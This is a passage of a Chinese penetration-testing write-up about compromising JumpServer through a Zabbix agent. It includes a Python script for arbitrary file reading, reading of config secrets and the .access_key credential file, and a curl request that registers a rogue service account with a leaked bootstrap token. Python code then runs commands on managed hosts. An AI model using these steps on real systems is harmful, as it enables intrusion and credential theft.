356px;" data-type="png" data-w="2182" src="https://wechat2rss.xlab.app/img-proxy/?k=a7ec0287&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIaEQ2rclljwADHBf5ibNjj9I0ezk4icw2aWJGEoFz54R5ibSKu8j8cG8eQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">jumpserver未对目录进行权限限制，所以可以读取到jumpserver的配置文件信息，但是jumpserver默认是使用docker构建，且数据库和redis都没有映射出来，所以读取出来的redis和数据库账号密码没办法直接利用。<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">于是本地搭建jumpserver环境，首先了解了 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">/opt/jumpserver</code> 目录下的目录结构，又根据之前jumpserver的日志文件泄露漏洞，想通过读取日志文件信息，进而获取jumpserver服务器权限，默认的日志文件路径为：<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">/opt/jumpserver/core/logs/jumpserver.log</code></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix_get</code>读取文件内容存在限制，仅能读取小于64KB大小的文件，</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="36" data-ratio="0.06412639405204461" data-s="300,640" style="width: 561px;height: 36px;" data-type="png" data-w="2152" src="https://wechat2rss.xlab.app/img-proxy/?k=d2225714&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIRE0ooicVe3UG8rdApdMp1iaZj3tfg7B5xD4ia5xkt4MfPdPnRkXcqQOQA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">翻了一下zabbix关于利用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">vfs.file.contents</code>读文件的文档：<a href="https://www.zabbix.com/documentation/4.0/en/manual/config/items/itemtypes/zabbix_agent，发现除了" target="_blank">https://www.zabbix.com/documentation/4.0/en/manual/config/items/itemtypes/zabbix_agent，发现除了</a><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">vfs.file.contents</code>外，还有一个<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">vfs.file.regexp</code>操作，大概的意思就是输出特定正则匹配的某一行，然后可以指定从开始和结束的行号。<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="113" data-ratio="0.20300751879699247" data-s="300,640" style="width: 558px;height: 113px;" data-type="png" data-w="2926" src="https://wechat2rss.xlab.app/img-proxy/?k=2596b9a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIQJJvORbPBiccJJcQLdQBGia8wqAm2uic1UlcWtiaLOHicc6o7icWIhKIPEOw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">于是利用该方法写了一个简单的任意读文件的脚本（还不够完善），来突破文件读取的大小限制：<br/></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #c678dd;line-height: 26px;">from</span> __future__ <span style="color: #c678dd;line-height: 26px;">import</span> print_function<br/><span style="color: #c678dd;line-height: 26px;">import</span> subprocess<br/>target = <span style="color: #98c379;line-height: 26px;">&#34;192.168.21.166&#34;</span><br/>file = <span style="color: #98c379;line-height: 26px;">&#34;/opt/jumpserver/core/logs/jumpserver.log&#34;</span><br/><span style="color: #c678dd;line-height: 26px;">for</span> i <span style="color: #c678dd;line-height: 26px;">in</span> range(<span style="color: #d19a66;line-height: 26px;">1</span>, <span style="color: #d19a66;line-height: 26px;">2000</span>):<br/>    cmd = <span style="color: #98c379;line-height: 26px;">&#39;vfs.file.regexp[{file},&#34;.*&#34;,,{start},{end},]&#39;</span>.format(file=file, start=i, end=i+<span style="color: #d19a66;line-height: 26px;">1</span>)<br/>    p = subprocess.Popen([<span style="color: #98c379;line-height: 26px;">&#34;zabbix_get&#34;</span>, <span style="color: #98c379;line-height: 26px;">&#34;-s&#34;</span>, target, <span style="color: #98c379;line-height: 26px;">&#34;-k&#34;</span>, cmd], stdout=subprocess.PIPE)<br/>    result, error = p.communicate()<br/>    print(result, end=<span style="color: #98c379;line-height: 26px;">&#34;&#34;</span>)<br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">成功读取任意位置的文件内容：</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="401" data-ratio="0.7201465201465201" data-s="300,640" style="width: 558px;height: 402px;" data-type="png" data-w="2730" src="https://wechat2rss.xlab.app/img-proxy/?k=49674867&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIQyXs42GbXFK1fIC82Ft1e6ibSqhtV5SSIk4qXRr1VgdhlgvV2QRIe4A%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">通过读取配置文件，尝试使用<a href="https://paper.seebug.org/1502/文章中说的方法无果，且文章中利用到的如下两个未授权接口，从jumpserver" target="_blank">https://paper.seebug.org/1502/文章中说的方法无果，且文章中利用到的如下两个未授权接口，从jumpserver</a> 2.6.2版本开始也被修复。<br/></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">/api/v1/authentication/connection-token/<br/>/api/v1/users/connection-token/<br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">于是尝试读取redis的dump文件，想通过redis获取缓存中的session，读了很久但是也没有读取到，不知道是缓存中没有session还是其他原因。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">还尝试了通过读取数据库文件（/opt/jumpserver/mysql/data/jumpserver/）去获取配置信息，但是数据库文件权限不够，没办法读取。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x05 jumpserver服务账号利用<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">回看读取到的jumpserver配置文件，发现了jumpserver的两个配置项<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">SECRET_KEY</code>和<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">BOOTSTRAP_TOKEN</code></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="216" data-ratio="0.3879310344827586" data-s="300,640" style="width: 558px;height: 216px;" data-type="png" data-w="1624" src="https://wechat2rss.xlab.app/img-proxy/?k=91476ad3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIrpkac2EWHL9rxtEVy6yoXO6u1HjKd3SU1f17mb7PWpic3ODWxqOpE2A%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">SECRET_KEY</code>比较熟悉，是Django框架中的配置项，<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">BOOTSTRAP_TOKEN</code>这个比较眼生，对jumpserver源码进行分析，发现<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">BOOTSTRAP_TOKEN</code>是jumpserver中注册服务账号时用来认证的。<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">参考jumpserver的官方文档，<a href="https://docs.jumpserver.org/zh/master/dev/build，jumpserver的服务架构如下：" target="_blank">https://docs.jumpserver.org/zh/master/dev/build，jumpserver的服务架构如下：</a></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="397" data-ratio="0.7115021998742929" data-s="300,640" style="width: 558px;height: 397px;" data-type="png" data-w="1591" src="https://wechat2rss.xlab.app/img-proxy/?k=9786a80a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIBMPpNucA9wqPGyd6xYsLYpich9SpF6Ac0lbicn1TIONicNAf6YeCRbcCQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">jumpserver由多个服务组成，核心是core组件，还包括luna（JumpServer Web Terminal 前端）、lina（前端 UI）、koko（JumpServer 字符协议资产连接组件，支持 SSH, Telnet, MySQL, Kubernets, SFTP, SQL Server）、lion（JumpServer 图形协议资产连接组件，支持 RDP, VNC）组件，各个组件与core之间通过API进行调用。<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">各个组件与core之间的API调用是通过<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">AccessKey</code>进行认证鉴权，<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">AccessKey</code>是在服务启动时通过<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">BOOTSTRAP_TOKEN</code>向core模块注册服务账号来获取的，下面是koko模块注册的代码（<a href="https://github.com/jumpserver/koko/blob/00cee388993ee6e92889df24aa033d09ce132fc5/pkg/koko/koko.go）" target="_blank">https://github.com/jumpserver/koko/blob/00cee388993ee6e92889df24aa033d09ce132fc5/pkg/koko/koko.go）</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">调用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">MustLoadValidAccessKey</code>方法返回AccessKey，</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="143" data-ratio="0.2553648068669528" data-s="300,640" style="width: 560px;height: 143px;" data-type="png" data-w="1864" src="https://wechat2rss.xlab.app/img-proxy/?k=88193cb4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIpv1YYQgPYibickJ7TEiao90DY2mnMk6NU8PRsz378H7WQpxP1LLLOiba9w%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">从文件中获取，如果没有则调用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">MustRegisterTerminalAccount</code>方法，这个文件的位置在：/opt/jumpserver/koko/data/keys/.access_key<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="143" data-ratio="0.24456521739130435" data-s="300,640" style="width: 578px;height: 141px;" data-type="png" data-w="1472" src="https://wechat2rss.xlab.app/img-proxy/?k=a849a437&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIgmC7yWroRnEN05pOdV0cyy1wGjzJb6lP8kllT2WVo4LrA5HQefdB7Q%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">注册TerminalAccount的流程如下：<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="136" data-ratio="0.5173267326732673" data-s="300,640" style="width: 558px;height: 289px;" data-type="png" data-w="1616" src="https://wechat2rss.xlab.app/img-proxy/?k=1d371d46&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIJUFTiclhtESDucwYJ3zAlxMvld9ZmHaVkxs8zV92b65E2CNzL4rwQpA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">实际注册服务账号的方法如下<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="289" data-ratio="0.25502645502645505" data-s="300,640" style="width: 578px;height: 147px;" data-type="png" data-w="1890" src="https://wechat2rss.xlab.app/img-proxy/?k=dea85fa6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIeU4wUybOvxtaHJdZBCY5EkKicekO5PrTpsbAs0Qz4DSLdu6Br2soiaOA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">请求<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">/api/v1/terminal/terminal-registrations/</code>接口，并在<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">Authorization</code>头中带上<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">BootstrapToken</code>即可。<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">请求接口</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">curl http://<span style="color: #d19a66;line-height: 26px;">192.168</span><span style="color: #d19a66;line-height: 26px;">.21</span><span style="color: #d19a66;line-height: 26px;">.166</span>/api/v1/terminal/terminal-registrations/ -H <span style="color: #98c379;line-height: 26px;">&#34;Authorization: BootstrapToken M0ZDNTRENTYtODA4OS1DRTA0&#34;</span> --data <span style="color: #98c379;line-height: 26px;">&#34;name=test&amp;comment=koko&amp;type=koko&#34;</span><br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">会给你一个access key</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="27" data-galleryid="" data-ratio="0.04779411764705882" data-s="300,640" style="width: 565px;height: 27px;" data-type="png" data-w="3264" src="https://wechat2rss.xlab.app/img-proxy/?k=8d27c472&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIYHbLxj54uEY0lhdEWCtIELWZibytibF1RweTTHV2U8tkOubUhhukNQ1Q%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">或者也可以直接通过读取<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">/opt/jumpserver/koko/data/keys/.access_key</code>文件来获取<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">accesskey</code>。<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">有了<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">access key</code>后，就可以通过jumpserver的API进行利用，下面是通过jumpserver ops运维接口执行命令。</p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">首先通过<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">/api/v1/assets/assets/?offset=0&amp;limit=15&amp;display=1&amp;draw=1</code> 接口找到想要执行命令的主机</section></li></ol><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_assets_assets</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/assets/assets/?offset=0&amp;limit=15&amp;display=1&amp;draw=1&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    response = requests.get(url, auth=auth, headers=headers)<br/>    print(response.text)<br/></code></pre><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.2798948751642576" data-s="300,640" style="" data-type="png" data-w="1522" src="https://wechat2rss.xlab.app/img-proxy/?k=a02f284c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIOAyE1icCn5raI5EYU5q1sxiaPjibiakdqaNFgplFHg06dleT2Oql78nnsA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这里需要记住主机的资产ID，和admin_user的内容。<br/></p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1" start="2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">然后利用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">api/v1/ops/command-executions</code>接口对指定主机执行命令</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">代码如下，修改data中的主机和run_as内容为第一步找到的id和admin_user，command为需要执行的命令。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_ops_command_executions</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/ops/command-executions/&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    data = {<span style="color: #98c379;line-height: 26px;">&#34;hosts&#34;</span>:[<span style="color: #98c379;line-height: 26px;">&#34;fdfafb91-7b0a-425a-b250-56599bfc761b&#34;</span>],<span style="color: #98c379;line-height: 26px;">&#34;run_as&#34;</span>:<span style="color: #98c379;line-height: 26px;">&#34;973320fd-6f06-4f59-8758-8ee52b6f7283&#34;</span>,<span style="color: #98c379;line-height: 26px;">&#34;command&#34;</span>:<span style="color: #98c379;line-height: 26px;">&#34;whoami&#34;</span>}<br/>    response = requests.post(url, auth=auth, headers=headers, data=data)<br/>    print(response.text)<br/></code></pre><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.34963325183374083" data-s="300,640" style="" data-type="png" data-w="1636" src="https://wechat2rss.xlab.app/img-proxy/?k=0a305f19&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CI7HhIrnJNPenv0odZnq0Wib9dcUcUsWU4C1m0uZCIlXwQSKo9xm0zNgA%2F640%3Fwx_fmt%3Dpng"/></p><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1" start="3"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 